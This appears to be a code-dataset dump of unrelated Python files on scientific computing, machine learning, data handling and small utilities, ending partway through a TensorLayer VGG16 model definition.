content
stringlengths 5
1.05M
|
---|
import django_filters
from django import forms
from .models.song import Song
class SongFilter(django_filters.FilterSet):
artist = django_filters.CharFilter(lookup_expr='icontains', widget=forms.TextInput(attrs={'size':20}))
title = django_filters.CharFilter(lookup_expr='icontains', widget=forms.TextInput(attrs={'size':20}))
class Meta:
model = Song
fields = ['dance_type', 'holiday']
|
#!/usr/bin/python
'''
This is to clean up the extracted alignment so it contains only the full length sequences.
This removes the following from alignment:
1.sequences start with '-'
2.sequences end with '-'
3.sequences with '-' account for over 20% of the full length.
Arguments:
1. alignment fasta file ('-' indicates gaps)
'''
from sys import argv, exit
import os
from Bio import SeqIO
if len(argv) <> 2:
exit(__doc__)
inFname = argv[1]
outFname = inFname + '_partialRemoved.fasta'
inf = open(inFname, 'r')
outf = open(outFname, 'w')
records = SeqIO.parse(inf, 'fasta')
for record in records:
spCount = record.seq.count('-')
fullLen = len(record.seq)
missedPortion = float(spCount)/float(fullLen)
#print spCount, fullLen, missedPortion
if record.seq[0] == '-' or record.seq[-1] == '-' or missedPortion > 0.2:
continue
else:
outf.write(">%s\n%s\n\n"%(record.description, record.seq))
inf.close()
outf.close()
|
"""
T: O(NlogN + W**2*N)
S: O(N)
We operate on a sorted list of words to find the correct result.
On each iteration, we find all words which are one letter smaller
then the current one, and check if they have been seen already.
The chain length for the previous word plus one is the current
chain length. The answer is the maximum of those chains.
"""
from typing import Dict, List
class Solution:
def longestStrChain(self, words: List[str]) -> int:
dp = {} # type: Dict[str, int]
for word in sorted(set(words), key=len):
dp[word] = max(dp.get(word[:i] + word[i+1:], 0) + 1
for i in range(len(word)))
return max(dp.values())
|
"""Methods for computing, reading, and writing saliency maps."""
import numpy
import netCDF4
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
from gewittergefahr.deep_learning import saliency_maps as saliency_utils
EXAMPLE_DIMENSION_KEY = 'example'
CYCLONE_ID_CHAR_DIM_KEY = 'cyclone_id_char'
GRID_ROW_DIMENSION_KEY = 'grid_row'
GRID_COLUMN_DIMENSION_KEY = 'grid_column'
SATELLITE_LAG_TIME_KEY = 'satellite_lag_time'
GRIDDED_SATELLITE_CHANNEL_KEY = 'gridded_satellite_channel'
UNGRIDDED_SATELLITE_CHANNEL_KEY = 'ungridded_satellite_channel'
SHIPS_LAG_TIME_KEY = 'ships_lag_time'
SHIPS_CHANNEL_KEY = 'ships_channel'
CYCLONE_IDS_KEY = 'cyclone_id_strings'
INIT_TIMES_KEY = 'init_times_unix_sec'
GRIDDED_SATELLITE_SALIENCY_KEY = 'gridded_satellite_saliency_matrix'
UNGRIDDED_SATELLITE_SALIENCY_KEY = 'ungridded_satellite_saliency_matrix'
SHIPS_SALIENCY_KEY = 'ships_saliency_matrix'
THREE_SALIENCY_KEY = 'three_saliency_matrices'
GRIDDED_SATELLITE_INPUT_GRAD_KEY = 'gridded_satellite_input_grad_matrix'
UNGRIDDED_SATELLITE_INPUT_GRAD_KEY = 'ungridded_satellite_input_grad_matrix'
SHIPS_INPUT_GRAD_KEY = 'ships_input_grad_matrix'
THREE_INPUT_GRAD_KEY = 'three_input_grad_matrices'
MODEL_FILE_KEY = 'model_file_name'
LAYER_NAME_KEY = 'layer_name'
NEURON_INDICES_KEY = 'neuron_indices'
IDEAL_ACTIVATION_KEY = 'ideal_activation'
def check_metadata(layer_name, neuron_indices, ideal_activation):
"""Checks metadata for errors.
:param layer_name: See doc for `get_saliency_one_neuron`.
:param neuron_indices: Same.
:param ideal_activation: Same.
"""
error_checking.assert_is_string(layer_name)
error_checking.assert_is_integer_numpy_array(neuron_indices)
error_checking.assert_is_geq_numpy_array(neuron_indices, 0)
error_checking.assert_is_numpy_array(neuron_indices, num_dimensions=1)
error_checking.assert_is_not_nan(ideal_activation)
def get_saliency_one_neuron(
model_object, three_predictor_matrices, layer_name, neuron_indices,
ideal_activation):
"""Computes saliency maps with respect to activation of one neuron.
The "relevant neuron" is that whose activation will be used in the numerator
of the saliency equation. In other words, if the relevant neuron is n,
the saliency of each predictor x will be d(a_n) / dx, where a_n is the
activation of n.
:param model_object: Trained neural net (instance of `keras.models.Model` or
`keras.models.Sequential`).
:param three_predictor_matrices: length-3 list, where each element is either
None or a numpy array of predictors. Predictors must be formatted in
the same way as for training.
:param layer_name: Name of layer with relevant neuron.
:param neuron_indices: 1-D numpy array with indices of relevant neuron.
Must have length D - 1, where D = number of dimensions in layer output.
The first dimension is the batch dimension, which always has length
`None` in Keras.
:param ideal_activation: Ideal neuron activation, used to define loss
function. The loss function will be
(neuron_activation - ideal_activation)**2.
:return: three_saliency_matrices: length-3 list, where each element is
either None or a numpy array of saliency values.
three_saliency_matrices[i] will have the same shape as
three_predictor_matrices[i].
"""
check_metadata(
layer_name=layer_name, neuron_indices=neuron_indices,
ideal_activation=ideal_activation
)
error_checking.assert_is_list(three_predictor_matrices)
assert len(three_predictor_matrices) == 3
for this_predictor_matrix in three_predictor_matrices:
if this_predictor_matrix is None:
continue
error_checking.assert_is_numpy_array_without_nan(this_predictor_matrix)
these_flags = numpy.array(
[m is not None for m in three_predictor_matrices], dtype=bool
)
have_predictors_indices = numpy.where(these_flags)[0]
activation_tensor = None
for k in neuron_indices[::-1]:
if activation_tensor is None:
activation_tensor = (
model_object.get_layer(name=layer_name).output[..., k]
)
else:
activation_tensor = activation_tensor[..., k]
loss_tensor = (activation_tensor - ideal_activation) ** 2
saliency_matrices = saliency_utils.do_saliency_calculations(
model_object=model_object, loss_tensor=loss_tensor,
list_of_input_matrices=[
three_predictor_matrices[k] for k in have_predictors_indices
]
)
three_saliency_matrices = [None] * 3
for i, j in enumerate(have_predictors_indices):
three_saliency_matrices[j] = saliency_matrices[i]
return three_saliency_matrices
def write_file(
netcdf_file_name, three_saliency_matrices, three_input_grad_matrices,
cyclone_id_strings, init_times_unix_sec, model_file_name, layer_name,
neuron_indices, ideal_activation):
"""Writes saliency maps to NetCDF file.
E = number of examples
:param netcdf_file_name: Path to output file.
:param three_saliency_matrices: length-3 list, where each element is either
None or a numpy array of saliency values. three_saliency_matrices[i]
should have the same shape as the [i]th input tensor to the model.
Also, the first axis of each numpy array must have length E.
:param three_input_grad_matrices: Same as `three_saliency_matrices` but with
input-times-gradient values instead.
:param cyclone_id_strings: length-E list of cyclone IDs.
:param init_times_unix_sec: length-E numpy array of forecast-init times.
:param model_file_name: Path to file with neural net used to create saliency
maps (readable by `neural_net.read_model`).
:param layer_name: See doc for `get_saliency_one_neuron`.
:param neuron_indices: Same.
:param ideal_activation: Same.
"""
# Check input args.
check_metadata(
layer_name=layer_name, neuron_indices=neuron_indices,
ideal_activation=ideal_activation
)
error_checking.assert_is_list(three_saliency_matrices)
error_checking.assert_is_list(three_input_grad_matrices)
assert len(three_saliency_matrices) == 3
assert len(three_input_grad_matrices) == 3
num_examples = -1
for i in range(len(three_saliency_matrices)):
if three_saliency_matrices[i] is None:
assert three_input_grad_matrices[i] is None
continue
error_checking.assert_is_numpy_array_without_nan(
three_saliency_matrices[i]
)
error_checking.assert_is_numpy_array_without_nan(
three_input_grad_matrices[i]
)
if i == 0:
num_examples = three_saliency_matrices[i].shape[0]
expected_dim = numpy.array(
(num_examples,) + three_saliency_matrices[i].shape[1:], dtype=int
)
error_checking.assert_is_numpy_array(
three_saliency_matrices[i], exact_dimensions=expected_dim
)
error_checking.assert_is_numpy_array(
three_input_grad_matrices[i], exact_dimensions=expected_dim
)
expected_dim = numpy.array([num_examples], dtype=int)
error_checking.assert_is_string_list(cyclone_id_strings)
error_checking.assert_is_numpy_array(
numpy.array(cyclone_id_strings), exact_dimensions=expected_dim
)
error_checking.assert_is_integer_numpy_array(init_times_unix_sec)
error_checking.assert_is_numpy_array(
init_times_unix_sec, exact_dimensions=expected_dim
)
error_checking.assert_is_string(model_file_name)
# Write to NetCDF file.
file_system_utils.mkdir_recursive_if_necessary(file_name=netcdf_file_name)
dataset_object = netCDF4.Dataset(
netcdf_file_name, 'w', format='NETCDF3_64BIT_OFFSET'
)
dataset_object.setncattr(MODEL_FILE_KEY, model_file_name)
dataset_object.setncattr(LAYER_NAME_KEY, layer_name)
dataset_object.setncattr(NEURON_INDICES_KEY, neuron_indices)
dataset_object.setncattr(IDEAL_ACTIVATION_KEY, ideal_activation)
dataset_object.createDimension(EXAMPLE_DIMENSION_KEY, num_examples)
num_satellite_lag_times = None
if three_saliency_matrices[0] is not None:
num_grid_rows = three_saliency_matrices[0].shape[1]
num_grid_columns = three_saliency_matrices[0].shape[2]
num_satellite_lag_times = three_saliency_matrices[0].shape[3]
num_gridded_satellite_channels = three_saliency_matrices[0].shape[4]
dataset_object.createDimension(GRID_ROW_DIMENSION_KEY, num_grid_rows)
dataset_object.createDimension(
GRID_COLUMN_DIMENSION_KEY, num_grid_columns
)
dataset_object.createDimension(
SATELLITE_LAG_TIME_KEY, num_satellite_lag_times
)
dataset_object.createDimension(
GRIDDED_SATELLITE_CHANNEL_KEY, num_gridded_satellite_channels
)
these_dim = (
EXAMPLE_DIMENSION_KEY, GRID_ROW_DIMENSION_KEY,
GRID_COLUMN_DIMENSION_KEY, SATELLITE_LAG_TIME_KEY,
GRIDDED_SATELLITE_CHANNEL_KEY
)
dataset_object.createVariable(
GRIDDED_SATELLITE_SALIENCY_KEY,
datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[GRIDDED_SATELLITE_SALIENCY_KEY][:] = (
three_saliency_matrices[0]
)
dataset_object.createVariable(
GRIDDED_SATELLITE_INPUT_GRAD_KEY,
datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[GRIDDED_SATELLITE_INPUT_GRAD_KEY][:] = (
three_input_grad_matrices[0]
)
if three_saliency_matrices[1] is not None:
if num_satellite_lag_times is None:
num_satellite_lag_times = three_saliency_matrices[1].shape[1]
dataset_object.createDimension(
SATELLITE_LAG_TIME_KEY, num_satellite_lag_times
)
else:
assert (
num_satellite_lag_times ==
three_saliency_matrices[1].shape[1]
)
num_ungridded_satellite_channels = three_saliency_matrices[1].shape[2]
dataset_object.createDimension(
UNGRIDDED_SATELLITE_CHANNEL_KEY, num_ungridded_satellite_channels
)
these_dim = (
EXAMPLE_DIMENSION_KEY, SATELLITE_LAG_TIME_KEY,
UNGRIDDED_SATELLITE_CHANNEL_KEY
)
dataset_object.createVariable(
UNGRIDDED_SATELLITE_SALIENCY_KEY,
datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[UNGRIDDED_SATELLITE_SALIENCY_KEY][:] = (
three_saliency_matrices[1]
)
dataset_object.createVariable(
UNGRIDDED_SATELLITE_INPUT_GRAD_KEY,
datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[UNGRIDDED_SATELLITE_INPUT_GRAD_KEY][:] = (
three_input_grad_matrices[1]
)
if three_saliency_matrices[2] is not None:
num_ships_lag_times = three_saliency_matrices[2].shape[1]
num_ships_channels = three_saliency_matrices[2].shape[2]
dataset_object.createDimension(SHIPS_LAG_TIME_KEY, num_ships_lag_times)
dataset_object.createDimension(SHIPS_CHANNEL_KEY, num_ships_channels)
these_dim = (
EXAMPLE_DIMENSION_KEY, SHIPS_LAG_TIME_KEY, SHIPS_CHANNEL_KEY
)
dataset_object.createVariable(
SHIPS_SALIENCY_KEY, datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[SHIPS_SALIENCY_KEY][:] = (
three_saliency_matrices[2]
)
dataset_object.createVariable(
SHIPS_INPUT_GRAD_KEY, datatype=numpy.float32, dimensions=these_dim
)
dataset_object.variables[SHIPS_INPUT_GRAD_KEY][:] = (
three_input_grad_matrices[2]
)
if num_examples == 0:
num_id_characters = 1
else:
num_id_characters = numpy.max(numpy.array([
len(id) for id in cyclone_id_strings
]))
dataset_object.createDimension(CYCLONE_ID_CHAR_DIM_KEY, num_id_characters)
this_string_format = 'S{0:d}'.format(num_id_characters)
cyclone_ids_char_array = netCDF4.stringtochar(numpy.array(
cyclone_id_strings, dtype=this_string_format
))
dataset_object.createVariable(
CYCLONE_IDS_KEY, datatype='S1',
dimensions=(EXAMPLE_DIMENSION_KEY, CYCLONE_ID_CHAR_DIM_KEY)
)
dataset_object.variables[CYCLONE_IDS_KEY][:] = numpy.array(
cyclone_ids_char_array
)
dataset_object.createVariable(
INIT_TIMES_KEY, datatype=numpy.int32, dimensions=EXAMPLE_DIMENSION_KEY
)
dataset_object.variables[INIT_TIMES_KEY][:] = init_times_unix_sec
dataset_object.close()
def read_file(netcdf_file_name):
"""Reads saliency maps from NetCDF file.
:param netcdf_file_name: Path to input file.
:return: saliency_dict: Dictionary with the following keys.
saliency_dict['three_saliency_matrices']: See doc for `write_file`.
saliency_dict['three_input_grad_matrices']: Same.
saliency_dict['cyclone_id_strings']: Same.
saliency_dict['init_times_unix_sec']: Same.
saliency_dict['model_file_name']: Same.
saliency_dict['layer_name']: Same.
saliency_dict['neuron_indices']: Same.
saliency_dict['ideal_activation']: Same.
"""
dataset_object = netCDF4.Dataset(netcdf_file_name)
three_saliency_matrices = []
three_input_grad_matrices = []
if GRIDDED_SATELLITE_SALIENCY_KEY in dataset_object.variables:
three_saliency_matrices.append(
dataset_object.variables[GRIDDED_SATELLITE_SALIENCY_KEY][:]
)
three_input_grad_matrices.append(
dataset_object.variables[GRIDDED_SATELLITE_INPUT_GRAD_KEY][:]
)
else:
three_saliency_matrices.append(None)
three_input_grad_matrices.append(None)
if UNGRIDDED_SATELLITE_SALIENCY_KEY in dataset_object.variables:
three_saliency_matrices.append(
dataset_object.variables[UNGRIDDED_SATELLITE_SALIENCY_KEY][:]
)
three_input_grad_matrices.append(
dataset_object.variables[UNGRIDDED_SATELLITE_INPUT_GRAD_KEY][:]
)
else:
three_saliency_matrices.append(None)
three_input_grad_matrices.append(None)
if SHIPS_SALIENCY_KEY in dataset_object.variables:
three_saliency_matrices.append(
dataset_object.variables[SHIPS_SALIENCY_KEY][:]
)
three_input_grad_matrices.append(
dataset_object.variables[SHIPS_INPUT_GRAD_KEY][:]
)
else:
three_saliency_matrices.append(None)
three_input_grad_matrices.append(None)
saliency_dict = {
THREE_SALIENCY_KEY: three_saliency_matrices,
THREE_INPUT_GRAD_KEY: three_input_grad_matrices,
CYCLONE_IDS_KEY: [
str(id) for id in
netCDF4.chartostring(dataset_object.variables[CYCLONE_IDS_KEY][:])
],
INIT_TIMES_KEY: dataset_object.variables[INIT_TIMES_KEY][:],
MODEL_FILE_KEY: str(getattr(dataset_object, MODEL_FILE_KEY)),
LAYER_NAME_KEY: str(getattr(dataset_object, LAYER_NAME_KEY)),
NEURON_INDICES_KEY: numpy.array(
getattr(dataset_object, NEURON_INDICES_KEY), dtype=int
),
IDEAL_ACTIVATION_KEY: getattr(dataset_object, IDEAL_ACTIVATION_KEY)
}
dataset_object.close()
return saliency_dict
|
"""Generate synthetic data for PairedDNNClassifier."""
import os
import random
import string
import numpy as np
import pandas as pd
SEED = 123
NUMBER_OF_WORDS = 300
NUMBER_OF_DIMENSIONS = 500
NUMBER_OF_PAIRS = 1000
MAXIMUM_WORD_LENGTH = 10
NUMBER_OF_TRAINING_PAIRS = int(NUMBER_OF_PAIRS*.5)
# set seed for reproducibility
random.seed(SEED)
np.random.seed(SEED)
# generate random vectors
vectors = pd.DataFrame(np.random.rand(
NUMBER_OF_WORDS, NUMBER_OF_DIMENSIONS
))
# generate random words
vectors.index = [
''.join(
random.choice(string.ascii_letters)
for i in range(random.randint(1,MAXIMUM_WORD_LENGTH))
)
for _ in range(NUMBER_OF_WORDS)
]
# write word vectors
vectors.to_csv(
os.path.join('data', 'vectors.csv')
)
# generate word pairs
pairs = pd.DataFrame(np.random.randint(
0, high=NUMBER_OF_WORDS,
size=(NUMBER_OF_PAIRS,2)
), columns=['first', 'second'])
# add label
pairs.insert(2, 'label', pairs['first'] % 2)
# replace indexes with words
pairs['first'] = vectors.index[pairs['first']]
pairs['second'] = vectors.index[pairs['second']]
# write training pairs
pairs[:NUMBER_OF_TRAINING_PAIRS].reindex().to_csv(
os.path.join('data', 'train_pairs.csv')
)
# write test pairs
pairs[NUMBER_OF_TRAINING_PAIRS:].reindex().to_csv(
os.path.join('data', 'test_pairs.csv')
) |
import os
import sys
try:
from mpi4py import MPI
except:
MPI = False
def under_mpirun():
"""Return True if we're being executed under mpirun."""
# this is a bit of a hack, but there appears to be
# no consistent set of environment vars between MPI
# implementations.
for name in os.environ.keys():
if (
name == "OMPI_COMM_WORLD_RANK"
or name == "MPIEXEC_HOSTNAME"
or name.startswith("MPIR_")
or name.startswith("MPICH_")
):
return True
return False
if under_mpirun():
from mpi4py import MPI
def debug(*msg): # pragma: no cover
newmsg = ["%d: " % MPI.COMM_WORLD.rank] + list(msg)
for m in newmsg:
sys.stdout.write("%s " % m)
sys.stdout.write("\n")
sys.stdout.flush()
else:
MPI = None
def map_comm_heirarchical(K, K2):
"""
Heirarchical parallelization communicator mapping. Assumes K top level processes with K2 subprocessors each.
Requires comm_world_size >= K + K*K2. Noninclusive, Ki not included in K2i execution.
(TODO, this is not the most efficient architecture, could be achieve with K fewer processors, but this was easier to generalize)
"""
N = K + K * K2
comm_map_down = {}
comm_map_up = {}
color_map = [0] * K
for i in range(K):
comm_map_down[i] = [K + j + i * K2 for j in range(K2)]
color_map.extend([i + 1] * K2)
for j in comm_map_down[i]:
comm_map_up[j] = i
return comm_map_down, comm_map_up, color_map
def subprocessor_loop(comm_map_up):
"""
Subprocessors loop, waiting to receive a function and its arguements to evaluate.
Output of the function is returned. Loops until a stop signal is received
Input data format:
data[0] = function to be evaluated
data[1] = [list of arguments]
If the function to be evaluated does not fit this format, then a wrapper function
should be created and passed, that handles the setup, argument assignment, etc
for the actual function.
Stop sigal:
data[0] = False
"""
# comm = impl.world_comm()
rank = MPI.COMM_WORLD.Get_rank()
rank_target = comm_map_up[rank]
keep_running = True
while keep_running == True:
data = MPI.COMM_WORLD.recv(source=(rank_target), tag=0)
if data[0] == False:
break
else:
func_execution = data[0]
args = data[1]
output = func_execution(args)
MPI.COMM_WORLD.send(output, dest=(rank_target), tag=1)
def subprocessor_stop(comm_map_down):
"""
Send stop signal to subprocessors
"""
# comm = MPI.COMM_WORLD
for rank in comm_map_down.keys():
subranks = comm_map_down[rank]
for subrank_i in subranks:
MPI.COMM_WORLD.send([False], dest=subrank_i, tag=0)
print("All MPI subranks closed.")
if __name__ == "__main__":
from mpi4py import MPI
(
_,
_,
_,
) = map_comm_heirarchical(2, 4)
|
class Config():
def __init__(self):
self.gamma = 0.99
self.entropy_beta = 0.001
self.eps_clip = 0.2
self.steps = 128
self.batch_size = 32
self.training_epochs = 4
self.actors = 15
self.learning_rate = 0.00025
|
# coding=utf-8
from datapoller.settings import THRESHOLD_FOR_KP
LON_BLOCKS = 1024
LAT_BLOCKS = 512
def lat_lon_to_cell(lat, lon):
"""
Converts (lat, lon) to linear cell index, based on a 1024 x 512 grid.
Latitude ranges between -90.0 (south pole) and +90.0 (north pole), longitude is between -180.0 and +180.0.
"""
return int((lat + 90) * LAT_BLOCKS / 180.0) * (LON_BLOCKS) \
+ int((lon + 180) * LON_BLOCKS / 360.0)
def get_kp_level(lat):
"""
# 0 G0 66.5° or higher Very low
# 1 G0 64.5° Low
# 2 G0 62.4° Low
# 3 G0 60.4° Unsettled
# 4 G0 58.3° Active
# 5 G1 56.3° Minor storm 1700 per cycle (900 days per cycle)
# 6 G2 54.2° Moderate storm 600 per cycle (360 days per cycle)
# 7 G3 52.2° Strong storm 200 per cycle (130 days per cycle)
# 8 G4 50.1° Severe storm 100 per cycle (60 days per cycle)
# 9 G5 48.1° or lower
:param lat:
:return:
"""
kpTable = [66.5, 64.5, 62.4, 60.4, 58.3, 56.3, 54.2, 52.2, 50.1, 48.1]
i = 0
for latTable in kpTable:
if abs(lat) >= latTable:
return i
i += 1
return 10
def is_level_interesting_for_kp(level, kp):
return level >= THRESHOLD_FOR_KP[kp]
|
# Code from Chapter 9 of Machine Learning: An Algorithmic Perspective (2nd Edition)
# by Stephen Marsland (http://stephenmonika.net)
# You are free to use, change, or redistribute the code in any way you wish for
# non-commercial purposes, but please maintain the name of the original author.
# This code comes with no warranty of any kind.
# Stephen Marsland, 2008, 2014
# The conjugate gradients algorithm
import numpy as np
def Jacobian(x):
#return np.array([.4*x[0],2*x[1]])
return np.array([x[0], 0.4*x[1], 1.2*x[2]])
def Hessian(x):
#return np.array([[.2,0],[0,1]])
return np.array([[1,0,0],[0,0.4,0],[0,0,1.2]])
def CG(x0):
i=0
k=0
r = -Jacobian(x0)
p=r
betaTop = np.dot(r.transpose(),r)
beta0 = betaTop
iMax = 3
epsilon = 10**(-2)
jMax = 5
# Restart every nDim iterations
nRestart = np.shape(x0)[0]
x = x0
while i < iMax and betaTop > epsilon**2*beta0:
j=0
dp = np.dot(p.transpose(),p)
alpha = (epsilon+1)**2
# Newton-Raphson iteration
while j < jMax and alpha**2 * dp > epsilon**2:
# Line search
alpha = -np.dot(Jacobian(x).transpose(),p) / (np.dot(p.transpose(),np.dot(Hessian(x),p)))
print "N-R",x, alpha, p
x = x + alpha * p
j += 1
print x
# Now construct beta
r = -Jacobian(x)
print "r: ", r
betaBottom = betaTop
betaTop = np.dot(r.transpose(),r)
beta = betaTop/betaBottom
print "Beta: ",beta
# Update the estimate
p = r + beta*p
print "p: ",p
print "----"
k += 1
if k==nRestart or np.dot(r.transpose(),p) <= 0:
p = r
k = 0
print "Restarting"
i +=1
print x
x0 = np.array([-2,2,-2])
CG(x0)
|
import os
from dotenv import load_dotenv
load_dotenv()
def get_env(name: str, terminal_action=True) -> str:
"""
return to environment variables
"""
if name in os.environ:
return os.environ[name]
try:
if terminal_action is True:
return (input(f'Enter your {name}: '))
else:
return name
except Exception as e:
print(e)
|
import linktypes.default
import linktypes.steam
from linktypes.settings import LinktypeException
default = linktypes.default
all = {linktypes.default.name: linktypes.default,
linktypes.steam.name: linktypes.steam}
def get_config(linktypename):
try:
linktype = all[linktypename]
except KeyError:
raise LinktypeException('Invalid linktypename "{}"'
.format(linktypename))
return {'name': linktype.name,
'linktype': linktype,
'settings': linktype.settings()}
def deserialize(config):
linktypename = config['name']
try:
linktype = all[linktypename]
except KeyError:
raise LinktypeException('Invalid linktypename "{}"'
.format(linktypename))
try:
settings = config['settings']
except KeyError:
raise LinktypeException('Missing settings')
return {'name': linktype.name,
'linktype': linktype,
'settings': linktype.settings(settings)}
def serialize(config):
settings = {key: setting.serialize()
for key,setting in config['settings'].items()}
return {'name': config['name'],
'settings': settings}
def apply(config):
for key, setting in config['settings'].items():
setting.apply()
|
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 6 21:36:50 2017
@author: XLP
"""
import tensorflow as tf
import tensorlayer as tl
import numpy as np
from tensorlayer.layers import list_remove_repeat
Layer = tl.layers.Layer
def image_preprocess(img,meanval):
meanval = tf.constant(meanval,tf.float32)* (1./255)
img = tf.cast(img, tf.float32)
img = tf.subtract(img, meanval)
return img
class Mergelayer(Layer):
def __init__(
self,
layer = [],
name ='merge_layer',
):
Layer.__init__(self, name=name)
self.all_layers = list(layer[0].all_layers)
self.all_params = list(layer[0].all_params)
self.all_drop = dict(layer[0].all_drop)
for i in range(1, len(layer)):
self.all_layers.extend(list(layer[i].all_layers))
self.all_params.extend(list(layer[i].all_params))
self.all_drop.update(dict(layer[i].all_drop))
self.all_layers = list_remove_repeat(self.all_layers)
self.all_params = list_remove_repeat(self.all_params)
def model_VGG16_DIMAN(x, y_,fw, im, iw, mm, mw, c, batch_size, data_shape, reuse,mean_file_name=None,is_train = True, network_scopename = "VGG16_DIMAVN" ):
if mean_file_name!=None:
meanval = np.load(mean_file_name)
x = image_preprocess(x,meanval)
gamma_init=tf.random_normal_initializer(2., 0.1)
with tf.variable_scope(network_scopename, reuse=reuse):
tl.layers.set_name_reuse(reuse)
network_input = tl.layers.InputLayer(x, name='input')
""" conv1 """
network1 = tl.layers.Conv2dLayer(network_input, shape = [3, 3, 3, 64],
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_1')
network1 = tl.layers.Conv2dLayer(network1, shape = [3, 3, 64, 64], # 64 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_2')
network1 = tl.layers.BatchNormLayer(network1, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn1')
network1 = tl.layers.PoolLayer(network1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],padding='SAME',
pool = tf.nn.max_pool, name ='pool1') #outputsize: [H/2,W/2]
""" conv2 """
network2 = tl.layers.Conv2dLayer(network1, shape = [3, 3, 64, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_1')
network2 = tl.layers.Conv2dLayer(network2, shape = [3, 3, 128, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_2')
network2 = tl.layers.BatchNormLayer(network2, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn2')
network2 = tl.layers.PoolLayer(network2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool2') #outputsize: [H/4,W/4]
""" conv3 """
network3 = tl.layers.Conv2dLayer(network2, shape = [3, 3, 128, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_1')
network3 = tl.layers.Conv2dLayer(network3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_2')
network3 = tl.layers.Conv2dLayer(network3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_3')
network3 = tl.layers.BatchNormLayer(network3, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn3')
network3 = tl.layers.PoolLayer(network3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool3') #outputsize: [H/8,W/8]
""" conv4 """
network4 = tl.layers.Conv2dLayer(network3, shape = [3, 3, 256, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_1')
network4 = tl.layers.Conv2dLayer(network4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_2')
network4 = tl.layers.Conv2dLayer(network4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_3')
network4 = tl.layers.BatchNormLayer(network4, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn4')
network4 = tl.layers.PoolLayer(network4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool4') #outputsize: [H/16,W/16]
""" conv5 """
network5 = tl.layers.Conv2dLayer(network4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_1')
network5 = tl.layers.Conv2dLayer(network5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_2')
network5 = tl.layers.Conv2dLayer(network5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_3')
network5 = tl.layers.BatchNormLayer(network5, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn5')
network5 = tl.layers.PoolLayer(network5, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool5') #outputsize: [H/32,W/32]
'#########################Upsample and merge##########################'
'''top-down 5'''
network5_conv = tl.layers.Conv2dLayer(network5, shape = [3, 3, 512, 64], act = tf.nn.relu, # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_conv')
network5_up = tl.layers.UpSampling2dLayer(network5_conv,
size = [data_shape[0]//16,data_shape[1]//16],method =0,is_scale = False,name = 'upsample5' ) # output:[H/16,W/16,64]
'''top-down 4'''
